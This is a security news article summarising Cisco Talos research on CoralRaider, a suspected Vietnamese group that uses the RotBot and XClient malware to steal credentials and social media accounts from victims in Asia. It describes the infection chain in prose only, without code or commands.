RotBot Malware Used on Asian Victims
A suspected threat actor of Vietnamese origin has been observed targeting individuals in various Asian and Southeast Asian nations with malicious software aimed at extracting valuable data since at least May 2023. Identified by Cisco Talos as CoralRaider, this group appears to be driven by financial motives. Their campaign spans across India, China, South Korea, Bangladesh, Pakistan, Indonesia, and Vietnam.
Security researchers Chetan Raghuprasad and Joey Chen have noted that CoralRaider concentrates on pilfering victims' credentials, financial records, and social media profiles, including business and advertising accounts. They deploy customized variants of Quasar RAT named RotBot and XClient stealer as their primary tools.
In addition to these, the group employs various off-the-shelf malware such as AsyncRAT, NetSupport RAT, and Rhadamanthys for remote access and data theft. Particularly in Vietnam, they have shown interest in seizing control of business and advertising accounts using malware families like Ducktail, NodeStealer, and VietCredCare.
Telegam Used to Funnel Stolen Data
The stolen information is transferred through Telegram and sold in underground markets for profit. CoralRaider's operators are believed to be based in Vietnam, evident from their communication on Telegram channels and the use of Vietnamese language elements in their tools.
Their attack typically begins with a Windows shortcut file (LNK), although the method of distribution remains unclear. Upon opening the LNK file, an HTML application (HTA) is downloaded from a server controlled by the attacker, triggering an embedded Visual Basic script. This script decrypts and executes three PowerShell scripts consecutively, responsible for various evasion tactics and the deployment of RotBot.
RotBot, once activated, connects with a Telegram bot to retrieve and execute XClient stealer in memory. This malware specializes in harvesting cookies, credentials, and financial data from popular web browsers such as Brave, Cốc Cốc, Google Chrome, Microsoft Edge, Mozilla Firefox, and Opera, along with data from Discord and Telegram.
Moreover, XClient is designed to extract information from victims' social media accounts like Facebook, Instagram, TikTok, and YouTube, including details related to payment methods and permissions associated with Facebook business and advertising accounts.